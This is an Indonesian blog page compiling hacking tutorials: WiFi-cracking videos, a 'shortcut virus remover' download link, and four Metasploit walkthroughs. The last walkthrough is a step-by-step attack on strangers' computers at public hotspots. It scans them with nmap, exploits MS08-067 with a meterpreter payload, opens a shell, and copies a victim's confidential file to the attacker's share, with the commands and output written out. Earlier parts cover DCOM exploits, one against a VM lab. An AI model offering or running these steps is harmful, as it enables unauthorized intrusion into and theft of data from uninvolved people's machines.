/></a><br />Anda tahu virus shortcut bukan? Virus Shortcut memang membuat jengkel, gemes dan membuat pusing kepala. Virus yang satu ini memang sangat bandel. Tidak bisa di Kill begitu saja dari task manager, karena memiliki proteksi. Pekerjaan virus yang satu ini adalah membuat shortcut dari folder yang ada di komputer dan menyembunyikan (hidden)file atau folder aslinya. Orang yang awam akan mengira shortcut tersebut adalah folder, dan mendouble kliknya yang membuat virus itu akan semakin menyebar.<br /><br />Salah satu ciri-ciri virus ini adalah komputer atau flashdisk anda akan banyak sekali shortcut yang namanya sama seperti folder pada komputer anda. Sangat menyebalkan. Antivirus kadang tak menemukan virus ini.<br /><br />Nah berikut saya share tools khusus untuk melenyapkan virus shortcut ini. Namanya VIRUS SHORTCUT REMOVER. Bila berminat silahkan download <a href="http://downloads.ziddu.com/downloadfiles/12934610/SHORTCUTREMOVER.rar">di sini</a>. Semoga berguna!salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-65697601511956385142011-06-16T11:46:00.000-07:002011-06-16T11:50:19.765-07:00Video Wireless Password HackingBerikut ini adalah beberapa video tutorial untuk hacking wireless, cracking wireless, hacking wifi, hacking password wi-fi, hacking wpa, hacking wep, cracking wpa, cracking wep, crack wpa, crack wep, hack wireless, hack hotspot, crack hotspot, cracking hotspot, hacking hotspot, hacking wi-fi, cracking wi-fi, hack wi-fi, crack wi-fi.<br />Pendahuluan<br /><br />Wi-Fi merupakan kependekan dari Wireless Fidelity, yang memiliki pengertian yaitu sekumpulan standar yang digunakan untuk Jaringan Lokal Nirkabel (Wireless Local Area Networks – WLAN) yang didasari pada spesifikasi IEEE 802.11. Standar terbaru dari spesifikasi 802.11a atau b, seperti 802.11 g, saat ini sedang dalam penyusunan, spesifikasi terbaru tersebut menawarkan banyak peningkatan mulai dari luas cakupan yang lebih jauh hingga kecepatan transfernya<br /><br />Awalnya Wi-Fi ditujukan untuk penggunaan perangkat nirkabel dan Jaringan Area Lokal (LAN), namun saat ini lebih banyak digunakan untuk mengakses internet. Hal ini memungkinan seseorang dengan komputer dengan kartu nirkabel (wireless card) atau personal digital assistant (PDA) untuk terhubung dengan internet dengan menggunakan titik akses (atau dikenal dengan hotspot) terdekat.<br /><br />WPA (bahasa Inggris: Wi-Fi Protected Access) adalah suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel. Metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP. Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i. Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC).<br /><br />Fungsi dari komputer pribadi ini kemudian dikenal dengan istilah authentication server, yang memberikan key yang berbeda kepada masing–masing pengguna/client dari suatu jaringan nirkabel yang menggunakan akses point sebagai media sentral komunikasi. Seperti dengan jaringan WEP, metoda enkripsi dari WPA ini juga menggunakan algoritma RC4.<br /><br />Pengamanan jaringan nirkabel dengan metoda WPA ini, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA ini. Ketiga menu yang harus diisi tersebut adalah:<br /><br />Server<br />Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.<br />Port<br />Nomor port yang digunakan adalah 1812.<br />Shared Secret<br />Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.<br /><br />Setelah komputer di install perangkat lunak otontikasi seperti freeRADIUS, maka sertifikat yang dari server akan dibagikan kepada client.<br /><br />Untuk menggunakan Radius server bisa juga dengan tanpa menginstall perangkat lunak di sisi komputer client. Cara yang di gunakan adalah Web Authentication dimana User akan diarahkan ke halaman Login terlebih dahulu sebelum bisa menggunakan Jaringan Wireless. Dan Server yang menangani autentikasi adalah Radius server.<br /><br />Berikut ini adalah beberapa videonya<br /><br /><iframe width="560" height="349" src="http://www.youtube.com/embed/n2FpaRcpj78" frameborder="0" allowfullscreen></iframe><br /><br /><iframe width="560" height="349" src="http://www.youtube.com/embed/GqleMWzSvUk" frameborder="0" allowfullscreen></iframe><br /><br /><iframe width="425" height="349" src="http://www.youtube.com/embed/evaUfdvkPM8" frameborder="0" allowfullscreen></iframe><br /><br /><iframe width="425" height="349" src="http://www.youtube.com/embed/SWEBQN_pazA" frameborder="0" allowfullscreen></iframe><br /><br /><iframe width="560" height="349" src="http://www.youtube.com/embed/2dLUhMWzVPs" frameborder="0" allowfullscreen></iframe>salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-34855410640041167032011-06-16T11:12:00.000-07:002011-06-16T11:45:02.393-07:005 cara Hacking Dengan Metasploitkali ini salazar akan share sedikit tentang aplikasi hacker favorit saya. Yaitu adalah METAPLOIT Framework ver. 2.6. Aplikasi ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows, Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya www.metasploit.com.<br /><br />Ketika saya menulis artikel ini, metasploit sudah merilis yang versi 3.5, tapi saya menggunakan versi 2.6, karna pada dasarnya sama saja, hanya saja versi 3.5 lebih banyak exploitnya . Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu mengirim bufferOverflow pada system korban, sehingga kita dapat menTakeOver shellnya.<br /><br />Langsung saja, berikut installasinya di Windows.<br /><br />1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google, usaha sedikit gan.<br /><br />2. Kemudian install, dan jalankan msfweb.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiORb3LAg_dxnB78fQgLLEoHGTVwIQV6D6C7tspdOJnJ5gtIFr4WBs9uc7XDO5GqHaiCgi0CyMnUJPOF9NdLrMNrxyafKS5B49XiVPL2GDeUjr3lyRixpj9bEUZT-CqeypUEKCk-UPlPZA/s1600/1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 150px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiORb3LAg_dxnB78fQgLLEoHGTVwIQV6D6C7tspdOJnJ5gtIFr4WBs9uc7XDO5GqHaiCgi0CyMnUJPOF9NdLrMNrxyafKS5B49XiVPL2GDeUjr3lyRixpj9bEUZT-CqeypUEKCk-UPlPZA/s320/1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618884455279084050" /></a><br /><br />Maka akan muncul window shell seperti berikut.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6POl-CcOyholP0ZedIjuWT-K8veu_1aMPpWNcEjr-hosjI8yObELIxLAs9bCy8D8gbE7G8u2AMa4a49ZvCT0d2Q7mpU55bNTgDrJpP2fS2f8qiF5B7IAqDrWVXZ2U6ZCrTUdHYQqqPEs/s1600/2.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 159px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6POl-CcOyholP0ZedIjuWT-K8veu_1aMPpWNcEjr-hosjI8yObELIxLAs9bCy8D8gbE7G8u2AMa4a49ZvCT0d2Q7mpU55bNTgDrJpP2fS2f8qiF5B7IAqDrWVXZ2U6ZCrTUdHYQqqPEs/s320/2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618884752458106306" /></a><br /><br />3. Buka Web Browser bisa Internet Explorer, Mozilla, OperaMini, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_1P8s4LLO_MJ_SmG2iV7DDEX-XAFCTzdwaHuCpN-FnsU6wxmY1KbPpYofTmehS-ukiOM0nkIsFWO1_J5Gaar1HTCoyz_vfeQPyX-WuDNpPpRVeODDwz1e3xGLDInoA91uMzCRvqrmr_A/s1600/3.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 192px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_1P8s4LLO_MJ_SmG2iV7DDEX-XAFCTzdwaHuCpN-FnsU6wxmY1KbPpYofTmehS-ukiOM0nkIsFWO1_J5Gaar1HTCoyz_vfeQPyX-WuDNpPpRVeODDwz1e3xGLDInoA91uMzCRvqrmr_A/s320/3.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5618885147455587218" /></a><br />Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti. <br /><br />4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP, terus kita lakukan port scanning. Disini kita akan mencoba pada system OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada port scanning, pastikan port untuk MSRPC tebuka (default = open). Download NMAP di www.nmap.org<br /><br />5.Memilih Exploit.<br /><br />Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY_KX64-BfJ5R2niKh0uhuTHZVJkcudeFq5RFe7YGGLvKeT8qEhf7fjMN0853hdUwpZe7B4O1-xIm0wzXpAd9XINS47p4c5nhZBpIAmi0AD6_KfePAZpB20S5FmKZjaLqABzAAUz6djqw/s1600/4.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 192px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY_KX64-BfJ5R2niKh0uhuTHZVJkcudeFq5RFe7YGGLvKeT8qEhf7fjMN0853hdUwpZe7B4O1-xIm0wzXpAd9XINS47p4c5nhZBpIAmi0AD6_KfePAZpB20S5FmKZjaLqABzAAUz6djqw/s320/4.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5618885453827904498" /></a><br /><br />Pilih target pada pilihan Select Target<br /><br />6. Memilih Payload<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8SWcIBiTvFtuCr0YvQXEsK46p6rMzQzI27aXnvoqRs_dap_y_C8BoIMWgIY1AkoKQY7pQg5RSIcD9FVKF9MWkfWyZRgByChJE2mNWSog4mNJIoTkMLo4BgzGwBgetlizn2RFl5PJVyKs/s1600/5.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 192px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8SWcIBiTvFtuCr0YvQXEsK46p6rMzQzI27aXnvoqRs_dap_y_C8BoIMWgIY1AkoKQY7pQg5RSIcD9FVKF9MWkfWyZRgByChJE2mNWSog4mNJIoTkMLo4BgzGwBgetlizn2RFl5PJVyKs/s320/5.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5618885712161566866" /></a><br />Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi2 payload :<br /><br />win32_adduser : menambah user pada system korban<br /><br />win32_bind : masuk ke shell korban<br /><br />win32_bind_dllinject : untuk upload / inject dll files<br /><br />win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (i like it ).<br /><br />win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).<br /><br />win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban<br /><br />win32_exec : mengeksekusi command di system korban.<br /><br />Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.<br /><br /> <a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh60vOXTQN4nr1pA37g642L9GB4LqfsXcylKaUBqL6c_RdPiADIHivVWLJJnRXG4aniSxmBoaXPif-BlQHK0CIsET79B09KuhEvkh_uRwKt496JxLvotJkit3NAUWFc-4RmlVeuPPc8bHc/s1600/6.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 192px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh60vOXTQN4nr1pA37g642L9GB4LqfsXcylKaUBqL6c_RdPiADIHivVWLJJnRXG4aniSxmBoaXPif-BlQHK0CIsET79B09KuhEvkh_uRwKt496JxLvotJkit3NAUWFc-4RmlVeuPPc8bHc/s320/6.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5618886163865488834" /></a><br /><br />RHOST ==>> Ip Address Korban (Remote).<br /><br />LHOST ==>> Ip Address Kita (Local)<br /><br />RPORT ==>> Port Korban<br /><br />LPORT ==>> Local Open Port<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHJW7IU9VNHkPBXo9aynQhZin7xPNYg2habM4wXr6KVWvsBw56HOy8ORwcW5CtrwFqHT00Ls6MU-GzxKxqwL-33_q0j8bROKuhOIPyyHIw0IJLTFJeqS14aZaNL61ct_5ORNZL1G1k0XE/s1600/8.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHJW7IU9VNHkPBXo9aynQhZin7xPNYg2habM4wXr6KVWvsBw56HOy8ORwcW5CtrwFqHT00Ls6MU-GzxKxqwL-33_q0j8bROKuhOIPyyHIw0IJLTFJeqS14aZaNL61ct_5ORNZL1G1k0XE/s320/8.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618886566849340338" /></a><br /><br /><br /><br />Setelah diisi semua, kemudian klik exploit untuk mengHack. Hahaha , selamat mencoba.<br /><br />Source: http://lebaksono<dotz>wordpress<dotz>com/2010/11/16/hacking-dengan-metasploit-exploit/<br /><br /> <br />ARTIKEL KEDUA<br /><br />Wew… keren ya judulnya… sebenernya tutorial kayak gini udah banyak sih di internet, cuma lagi iseng aja pengen nulis tentang metasploit. :*Pasti kalian semua udah pada kenal apa itu metasploit, kalo pengen lebih jelasnya baca aja di websitenya metasploit.<br /><br />Tapi mungkin tutorial yang saya tulis ini baru pertama, soalnya OS yang saya pake lain dari yang lain. hehe.. Biasanya OS yang dipake buat aksi exploitasi adalah Backtrack, yang memang sudah teruji kehandalannya untuk Pentest (Penetration Testing). Pengen tau OS yang saya pake… ? hehe.. :p<br /><br />Nah, sekedar share aja ya… OS yang saya pake adalah TealinuxOS 2.0 yang sudah dimodifikasi untuk keperluan pentest. Karena TealinuxOS merupakan turunan ubuntu maka, tutorial ini juga berlaku untuk semua distro turunan Ubuntu.<br />Sebelum belajar metasploit yang perlu disiapkan adalah :<br />Cemilan, buat ngilangin stress kalo exploitasinya gagal mulu… hehe :p<br />OS, terserah, yang penting Linux <br />Metasploit Framework, bisa donlod langsung di websitenya metasploit. trus langsung di install ya …<br />fping, install langsung aja, caranya “sudo apt-get install fping”<br />nmap, install langsung juga, caranya “sudo apt-get install nmap”<br />dan yang terakhir jangan lupa siapkan KORBANnya..wkwkwk…<br /><br />langkah-langkahnya ikuti aja video yang udah saya buat ini,<br /><br />Tutorialnya bisa di download DISINI<br /><br />Source: http://www<dotz>mazumam<dotz>web<dotz>id/2010/07/hack-windows-dengan-metasploit-di_21.html<br /><br /> <br />ARTIKEL KETIGA<br /><br />Rasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.<br /><br />Apakah itu metasploit ? Sulitkah menggunakannnya ?<br /><br />Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer diexploitasi dengan script exploit : KAHT .<br /><br />Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini :<br /><br />1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC<br /><br />2. Metasploit Framework, dapat di download disini<br /><br />3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM.<br /><br />4. Vmware, dapat di download disini<br /><br />Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah.<br /><br />Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini.<br /><br />Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :<br /><br />What is it?<br /><br />The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.<br /><br />What does it do?<br /><br />The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.<br /><br />Semuanya saya biarkan tertulis dalam bahasa orang bule sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia.<br /><br />Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini.<br /><br />Sekarang mari kita ngoprek komputer !<br /><br />Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !<br /><br />Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan seperti berikut :<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtCGRhm7NTiU3tUn8NN3NnoU0cYjNLekzq83DkFLk8I-VQ7bBCkU1asNmoqgK41pPdb77EFihh-icXUsT1BALiCawOGO6HLa2Z5P5-mVq8fLhfsXjXGVC5XTHNOvJF7pRFoSxIkdCbRag/s1600/8.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtCGRhm7NTiU3tUn8NN3NnoU0cYjNLekzq83DkFLk8I-VQ7bBCkU1asNmoqgK41pPdb77EFihh-icXUsT1BALiCawOGO6HLa2Z5P5-mVq8fLhfsXjXGVC5XTHNOvJF7pRFoSxIkdCbRag/s320/8.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618887055971205954" /></a><br /><br /><br />Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfpHTeemjIkZ16789CRLPSZWOSlsUeXMs_UWF6pj-kfZ_lsl1VCpkTAX2u9s5yxgulO0OAop2_VnkwEOZ5p8wfPcH9tsEpIFOLjEaVfyg7OBJFFHWQ8scqFIQ8Xpl8TAkS2zmJ0ZBB45Y/s1600/9.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfpHTeemjIkZ16789CRLPSZWOSlsUeXMs_UWF6pj-kfZ_lsl1VCpkTAX2u9s5yxgulO0OAop2_VnkwEOZ5p8wfPcH9tsEpIFOLjEaVfyg7OBJFFHWQ8scqFIQ8Xpl8TAkS2zmJ0ZBB45Y/s320/9.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618887423521629234" /></a><br /><br />Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA_s6VfiIxYM_4AUTL40og_z2aNJi-DdkthWoMUdUottlOR4Zb25I62OwLeRP64DBXXUpBhw1Ro-aEuLM-xYdMYmTv3HTTrQZ2r4TnMOQ_9fdMREIW-FP4KAYHdI4aCOgQAcH65PDhKZc/s1600/10.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 183px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA_s6VfiIxYM_4AUTL40og_z2aNJi-DdkthWoMUdUottlOR4Zb25I62OwLeRP64DBXXUpBhw1Ro-aEuLM-xYdMYmTv3HTTrQZ2r4TnMOQ_9fdMREIW-FP4KAYHdI4aCOgQAcH65PDhKZc/s320/10.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618887583060239234" /></a><br /><br /><br />Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxAFCdFdfmvUkEJu5NwhxLk3lnrQFYElRH4RumQUHyl55mOLdwuHrb_hb2EThOuJn3tMnqAHvtbW_vQkHGusOl6lSD8UFJ9N3JAIJ0fE_acxAtdvg8PN74S5CkmBhI6R2ljsrEfpKVLPI/s1600/11.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 184px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxAFCdFdfmvUkEJu5NwhxLk3lnrQFYElRH4RumQUHyl55mOLdwuHrb_hb2EThOuJn3tMnqAHvtbW_vQkHGusOl6lSD8UFJ9N3JAIJ0fE_acxAtdvg8PN74S5CkmBhI6R2ljsrEfpKVLPI/s320/11.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618887908257708258" /></a><br /><br /><br />Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah… Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mr_lwWPa0k3JwpRnEbkjKOH5QwZqxPpsSRg_bgqe-53Veqr2QSZC5g0rg0lAjidMSAHHuke40w15QM8f1mrRPnyOxlw_j9p5px0UqceTloOCuMoBvzY5IQAEA5d0TtokBIQpECEo2Gs/s1600/12.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 257px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mr_lwWPa0k3JwpRnEbkjKOH5QwZqxPpsSRg_bgqe-53Veqr2QSZC5g0rg0lAjidMSAHHuke40w15QM8f1mrRPnyOxlw_j9p5px0UqceTloOCuMoBvzY5IQAEA5d0TtokBIQpECEo2Gs/s320/12.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618888189128875474" /></a><br /><br />Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4LqdRlLxteFJgvEZ5GQkIcFNk51Wkh6-fibk3_AC9wMnv3_NhyphenhyphenLGgn7UJ1_Si2pn6FsnP0OGlEXGiEuMKfYNACZRPkn7gc6Sn8jrNkqkWu2wHw7Xu96myL2hDMVaGF44FtgHC1IForo8/s1600/13.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4LqdRlLxteFJgvEZ5GQkIcFNk51Wkh6-fibk3_AC9wMnv3_NhyphenhyphenLGgn7UJ1_Si2pn6FsnP0OGlEXGiEuMKfYNACZRPkn7gc6Sn8jrNkqkWu2wHw7Xu96myL2hDMVaGF44FtgHC1IForo8/s320/13.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5618888528765161042" /></a><br /><br />Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini Mudah bukan ?<br /><br />Source: http://www<dotz>agungsetiawan<dotz>web<dotz>id<br />ARTIKEL KEEMPAT<br /><br />Kali ini saya akan berikan cara menerobos komputer orang<br />di area wifi seperti hotel, kampus atau restoran<br />dalam hal ini tentu saja saya pake OS Linux hehehe<br /><br />Tentu kita ingin tahu data apa yang ada di dalam<br />setelah download metasploit for linux di http://www.metasploit.com/download/<br /><br />Install dengan perintah<br /><br />$su<br /># ./namafile.run<br /><br />pilih yes<br />tidak perlu diupdate<br /><br />Ok silahkan jalan-jalan di area hotspot di kampus, mall atau cafe/restoran<br />jangan lupa duduk yang manis dan tenang sambil minum juice (kopi kurang baik)<br /><br />Cari target komputer yang sedang aktif online<br />terlebih dulu cari tau nomor IP DHCP yang kita dapat.<br /><br />$ sudo ifconfig -a<br /><br />lihat hasilnya :<br />eth1 Link encap:Ethernet HWaddr 00:50:BF:1B:B5:51<br />inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255<br /><br />itu menunjukkan kita mendapat IP 192.168.0.10<br /><br />langsung scan komputer yang lagi online di area tersebut<br />$ nmap -sP 192.168.0.0/24<br /><br />lihat hasilnya :<br />Host 192.168.0.1 appears to be up.<br />MAC Address: 00:B0:6C:EF:47:30 (Unknown)<br />Host arman (192.168.0.10) appears to be up.<br />Host 192.168.0.1 appears to be up.<br />MAC Address: 00:E0:4C:ED:41:20 (Unknown)<br />Host mycomp (192.168.0.11) appears to be up.<br />MAC Address: 00:E0:5C:FD:45:17 (Unknown)<br />dan seterusnya……………<br /><br />OK pilih salah satu target (korban) yaitu : 192.168.0.11<br /><br />Lakukan ping dulu ke IP korban. sapa tau sudah dipasang firewall<br />$ ping 192.168.0.11<br /><br />Jika hasilnya reply maka siap melakukan langkah berikutnya<br /><br />Scan port yang terbuka terlebih dahulu<br />$ nmap 192.168.0.11<br /><br />lihat hasilnya:<br />PORT STATE SERVICE<br />139/tcp open nb-session<br />445/tcp open microsoft-ds<br />8080/tcp open http-proxy<br /><br />OK port 445 terbuka dan sasaran empuk untuk menyusup kesana<br />lakukan urutan exploitasi berikut:<br /><br />Jalankan metasploit<br />$ msfconsole<br /><br />Pilih jenis tools untuk exploit<br />msf> use windows/smb/ms08_067_netapi<br /><br />Pilih metode penyerangan<br />msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp<br /><br />Tambahkan target IP korban<br />msf exploit(ms08_067_netapi) > set RHOST 192.168.0.11<br /><br />Langsung lakukan exploit<br />msf exploit(ms08_067_netapi) > exploit<br /><br />jika muncul prompt dibawah ini brarti serangan berhasil<br />meterpreter><br /><br />Eiits tunggu dulu ini belum menguasai komputer korban sepenuhnya<br />Tinggal satu perintah lagi, setelah itu baru bisa diapa-apain.<br />meterpreter> execute -M -f cmd.exe -i<br /><br />lihat hasilnya :<br />C:\Windows\System32><br /><br />nah kita sudah masuk sepenuhnya… mau diapain nih?<br />jangan dirusak lah kasihan.. kita copy saja datanya ke komputer kita<br />barangkali ada surat rahasia atau data korupsi hehehe..<br /><br />OK persiapan untuk copy data<br />Pastikan Linux kita sudah ada samba dan service sudah started<br />Sharinglah sebuah folder di linux kita dengan permission read and write<br />jangan lupa juga : $ sudo chmod 777 nama-folder<br />disini saya kasih contoh nama folder saya “didit”<br /><br />OK Kembali ke komputer korban (target)<br />cari dulu data yang dianggap penting..<br />biasanya ditaruh di D:\ atau di My Documents<br />misalnya data yang kita incar ada di D:\ maka lakukan perintah berikut :<br />C:\Windows\System32>D:<br />D:\>dir<br />05/25/2010 10:57 PM 22.700 rahasia.doc<br /><br />Nah tuh ada file bernama “rahasia.doc”<br />selanjutnya kita buat mapping drive ke komputer kita<br />D:\>net use Z: \\192.168.0.10\didit<br /><br />OK tinggal copy file “rahasia.doc” ke drive Z: yang sebenarnya adalah komputer kita<br />D:\>copy rahasia.doc Z:<br 